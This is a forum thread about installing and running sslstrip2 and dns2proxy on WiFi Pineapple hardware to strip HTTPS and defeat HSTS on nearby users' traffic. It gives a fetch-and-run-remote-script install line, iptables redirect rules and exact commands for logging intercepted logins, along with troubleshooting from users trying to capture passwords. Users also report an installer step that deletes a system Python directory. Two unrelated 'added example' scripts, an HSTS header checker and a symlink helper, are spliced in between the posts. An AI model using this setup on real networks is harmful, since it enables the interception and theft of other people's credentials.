Hak5 Forums
Zylla

SSLstrip2 + dns2proxy (HSTS Bypassing)


SSLstrip2 + dns2proxy
Now WORKING on the Pineapple NANO + TETRA.


Last update: 15.01.2017
Changelog:

  • Uploaded everything to github.


Install procedure:

root@Pineapple:~#  wget -qO- https://raw.githubusercontent.com/adde88/sslstrip-hsts-openwrt/master/INSTALL.sh | bash -s -- -v -v

(This launches an install script that downloads a .ipk file containing the tools, and installs all the Python libraries correctly.)


What now?
sslstrip2 and dns2proxy get installed to /usr/share/, or /sd/usr/share when using the Pineapple NANO.
When using dns2proxy, please check that you traverse into its directory before launching it. (If not, you might encounter errors about missing files (nospoof.cfg) etc.)

root@Pineapple:~# cd /sd/usr/share/sslstrip2/
root@Pineapple:~# python sslstrip.py --help

root@Pineapple:~# cd /sd/usr/share/dns2proxy/
root@Pineapple:~# python dns2proxy.py --help


Github repo. + source-files:
https://github.com/adde88/sslstrip-hsts-openwrt
 

OPKG Installation File: (For those who want to install it manually)
https://github.com/adde88/sslstrip-hsts-openwrt/raw/master/sslstrip-hsts_0.9_ar71xx.ipk

  • Like 1
  • Upvote 2

1 minute ago, mercredi said:

Hi,

Thank you for your work!

Everything works good, but I can't see any credentials in the log files.

Good to hear that it's working!
About the logs: how do you launch sslstrip? What options are you supplying when you start it? (like the exact command you are issuing to start it)

  • Like 1


First I run

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python sslstrip.py -l 9000 -p -w log.txt
python dns2proxy.py

 

 

 

I got this error when I run: python sslstrip.py -l 9000 -p -w log.txt

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

 


For the time being you'll need to download and use it over terminal.

And I don't have an ETA on a module. But I hope to have it ready soon. :)

  • Like 1
  • Upvote 1

23 hours ago, mercredi said:

First I run


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

python sslstrip.py -l 9000 -p -w log.txt

python dns2proxy.py

 

 

 

I got this error when I run: python sslstrip.py -l 9000 -p -w log.txt


 

I'll do some testing later today, and see if I can replicate the issue. :)

  • Upvote 1

1 hour ago, Zylla said:

I'll do some testing later today, and see if I can replicate the issue. :)

thanks

 

Which command did you use to make it work and see SSL POST? I tried all options, but I can see only HTTP.

On 17.1.2017 at 6:11 PM, mercredi said:

thanks

 

Which command did you use to make it work and see SSL POST? I tried all options, but I can see only HTTP.

In the iptables command you used above you are only redirecting port 80 (HTTP).
You will need to redirect the HTTPS port (443) if you want to get that traffic as well.
That would explain why you're not seeing any encrypted traffic.


It seems like I might have slept too little the last week, lol.
You're not supposed to redirect port 443.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log

(replace "$interface_name_here" with the interface you are using)


Here's the usage of both tools:
sslstrip+

sslstrip 0.9 + by Moxie Marlinspike
Version + by Leonardo Nve
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

 

dns2proxy:

usage: dns2proxy.py [-h] [-N] [-i INTERFACE] [-u IP1] [-d IP2] [-I IPS] [-S]
                    [-A ADMINIP]

optional arguments:
  -h, --help            show this help message and exit
  -N, --noforward       DNS Fowarding OFF (default ON)
  -i INTERFACE, --interface INTERFACE
                        Interface to use
  -u IP1, --ip1 IP1     First IP to add at the response
  -d IP2, --ip2 IP2     Second IP to add at the response
  -I IPS, --ips IPS     List of IPs to add after ip1,ip2 separated with commas
  -S, --silent          Silent mode
  -A ADMINIP, --adminIP ADMINIP
                        Administrator IP for no filtering
  • Upvote 1


What is the exact command to see encrypted traffic?  

On 1/16/2017 at 8:07 AM, Zylla said:

Good to hear that it's working!
About the logs: how do you launch sslstrip? What options are you supplying when you start it? (like the exact command you are issuing to start it)

 

12 hours ago, Grognak said:

What is the exact command to see encrypted traffic?  

 

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log

On 20.1.2017 at 7:18 PM, crazyclown said:

Will this work on the Mark V Firmware 2.4?

Sadly my Mark VI is dead, but I am pretty certain that one guy in this thread tested it, and mentioned that it was working.
You could just test it and report back. I don't see any special reasons for it not working.


I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.

On 2/8/2017 at 2:00 AM, Null Trace said:

I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.

Hey Null Trace, you can have it running in the background if you install screen.

You can install this by using:

opkg install screen

Then, when you SSH in, run screen first by typing 'screen', run the commands, and before disconnecting hit CTRL-A and then D.

To retrieve your screen session, type 'screen -r'. If you have more than one screen instance, it will list them and you will need to type 'screen -r 4322', for example.

If you want to close a screen instance, retrieve it as above and type 'exit'.

As for running DWall etc., I'm not sure if it will work alongside, sorry :)

Hope this helps.

  • Upvote 2


Hello,

I "seem" to have this working, as in no errors and I can see all the dnsproxy info flashing across the screen.  I am not able to capture any passwords (I did a test with facebook.com and typed in a bogus email and password).  I also used tcpdump and looked at the results.  My data is still encrypted so that's why I cannot see my email address or password.  Anyone have any ideas?  Below are the commands I'm using.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

python dns2proxy.py -i wlan0  

python sslstrip.py -a -w /tmp/sslstrip_log

* wlan0 is the interface I'm hosting my AP on.  Please see attachment for networking screen.

 

Thanks!!

Scrag

 

  • Upvote 1


Hey Everybody.

I was really hoping someone could help a noob out  ;)

I "almost" got this working but I am stuck.  It appears dns2proxy is working but sslstrip is not.  Sslstrip just sits there after loading and does not display any info, and of course, does not strip ssl.

Here is what I'm doing:

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

cd /sd/usr/share/dns2proxy/
python dns2proxy.py

cd /sd/usr/share/sslstrip2/
python sslstrip.py -a -w /sd/ssltrip-log.txt

I can visually see all kinds of responses on the dns2proxy screen, but for sslstrip, it just sits at

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve

Any thoughts?

 

Thanks!

Scrag

  • Upvote 1


Okay. To clear things up a bit.
SSLstrip2 + dns2proxy does not work on every site. Good examples are Google and Facebook.
Browsers and sites have implemented fixes against this attack, like caching.

But it does have more success-chance compared to regular boring sslstrip :)

  • Upvote 2
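
The site-side protection referred to in the post above is an HSTS policy that browsers cache or preload. As an added example (not from the thread or from sslstrip2), the function below classifies a Strict-Transport-Security header value by how much it covers: a policy without includeSubDomains binds only the exact hostname, and the preload list requires max-age of at least one year plus includeSubDomains and preload. The function name hsts_audit and the sample headers are constructed.

```shell
#!/bin/sh
# Added example: classify a Strict-Transport-Security header value.
# Prints one of:
#   none           no usable policy (max-age missing, invalid or 0)
#   host-only      policy binds only the exact hostname
#   subdomains     policy also binds every subdomain
#   preload-ready  also meets the preload list's header requirements
hsts_audit() {
    max_age="" subs=0 preload=0
    old_ifs=$IFS
    IFS=';'            # directives are separated by ';'
    set -f             # no glob expansion while splitting
    for d in $1; do
        # Directive names are case-insensitive; trim surrounding blanks.
        d=$(printf '%s' "$d" | tr 'A-Z' 'a-z' |
            sed 's/^[[:space:]]*//; s/[[:space:]]*$//')
        case $d in
            max-age=*)
                v=${d#max-age=}
                v=${v#\"}; v=${v%\"}      # value may be a quoted string
                case $v in
                    ''|*[!0-9]*) max_age="" ;;
                    *) max_age=$v ;;
                esac ;;
            includesubdomains) subs=1 ;;
            preload) preload=1 ;;
        esac
    done
    set +f
    IFS=$old_ifs
    # Clamp very long values so the integer tests below cannot overflow.
    if [ "${#max_age}" -gt 10 ]; then max_age=9999999999; fi

    if [ -z "$max_age" ] || [ "$max_age" -eq 0 ]; then
        echo none
    elif [ "$subs" -eq 0 ]; then
        echo host-only
    elif [ "$preload" -eq 1 ] && [ "$max_age" -ge 31536000 ]; then
        echo preload-ready
    else
        echo subdomains
    fi
}

# Constructed sample headers.
for h in 'max-age=86400' \
         'max-age=63072000; includeSubDomains' \
         'max-age=31536000; includeSubDomains; preload'; do
    printf '%-50s %s\n' "$h" "$(hsts_audit "$h")"
done
```
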


Any news on updates like a module or something sweet?

Would very much like to see a module :P

On 10.3.2017 at 5:16 AM, Tar said:

Any news on updates like a module or something sweet?

Would very much like to see a module :P

Hi there!
I do have plans for making a module.
It's just that other stuff has been higher on my agenda, and I've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who weren't interested in Mana could still have an interest in sslstrip+, so I just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully I got something soon :)

  • Upvote 2

On 3/14/2017 at 8:23 AM, Zylla said:

Hi there!
I do have plans for making a module.
It's just that other stuff has been higher on my agenda, and I've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who weren't interested in Mana could still have an interest in sslstrip+, so I just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully I got something soon :)

Hehe, yeah man a module would be great :P

One of the main reasons I got the WiFi Pineapple was to use SSLstrip on my network. Take your time, lad, looking for some great things out of this community :)


To those installing this, you may want to go through the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 

2 minutes ago, Dirty Frank said:

To those installing this, you may want to go through the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 

You are totally correct about the script wiping out the Python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two Python directories". One internal, and one on the SD card.
For simplicity, and also because of the size of the libraries, I found it much better to have one directory on the SD card and just symlink that to the other directory.

But I guess I can create a warning message in the installer script. Just in case :)

2 hours ago, Zylla said:

You are totally correct about the script wiping out the Python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two Python directories". One internal, and one on the SD card.
For simplicity, and also because of the size of the libraries, I found it much better to have one directory on the SD card and just symlink that to the other directory.

But I guess I can create a warning message in the installer script. Just in case :)

How about the installer symlink the installed files instead of the directory itself (a la install the pkg to /sd and then "ln -s /sd/usr/lib/python2.7/* /usr/lib/python2.7")?
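
The per-entry symlink idea from the post above, written out as an added example (it is not part of INSTALL.sh or of any post in this thread): each entry on the SD card is linked into the internal directory, and anything that already exists there as a real file or directory is left untouched and counted instead of being deleted. The function name link_sd_python and its output format are assumptions made for this example.

```shell
#!/bin/sh
# Added example: link SD-card Python entries into the internal tree
# without removing what is already installed there.
#
# link_sd_python <sd_dir> <internal_dir>
# Prints "linked=N skipped=M". Skipped entries are existing real files or
# directories in <internal_dir>; they are reported on stderr and kept.
link_sd_python() {
    sd_dir=$1
    int_dir=$2
    linked=0
    skipped=0

    [ -d "$sd_dir" ] || { echo "missing source: $sd_dir" >&2; return 1; }
    mkdir -p "$int_dir" || return 1

    for src in "$sd_dir"/*; do
        [ -e "$src" ] || continue        # glob matched nothing
        name=${src##*/}
        dst=$int_dir/$name

        if [ -L "$dst" ]; then
            # A symlink from an earlier run: safe to refresh.
            rm -f "$dst" && ln -s "$src" "$dst" || return 1
            linked=$((linked + 1))
        elif [ -e "$dst" ]; then
            # Real file or directory owned by another install: keep it.
            echo "keeping existing $dst" >&2
            skipped=$((skipped + 1))
        else
            ln -s "$src" "$dst" || return 1
            linked=$((linked + 1))
        fi
    done

    echo "linked=$linked skipped=$skipped"
}
```

With the paths named in the thread, the call would be `link_sd_python /sd/usr/lib/python2.7 /usr/lib/python2.7`; a non-zero skipped count means the internal directory already holds its own copy of those entries.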

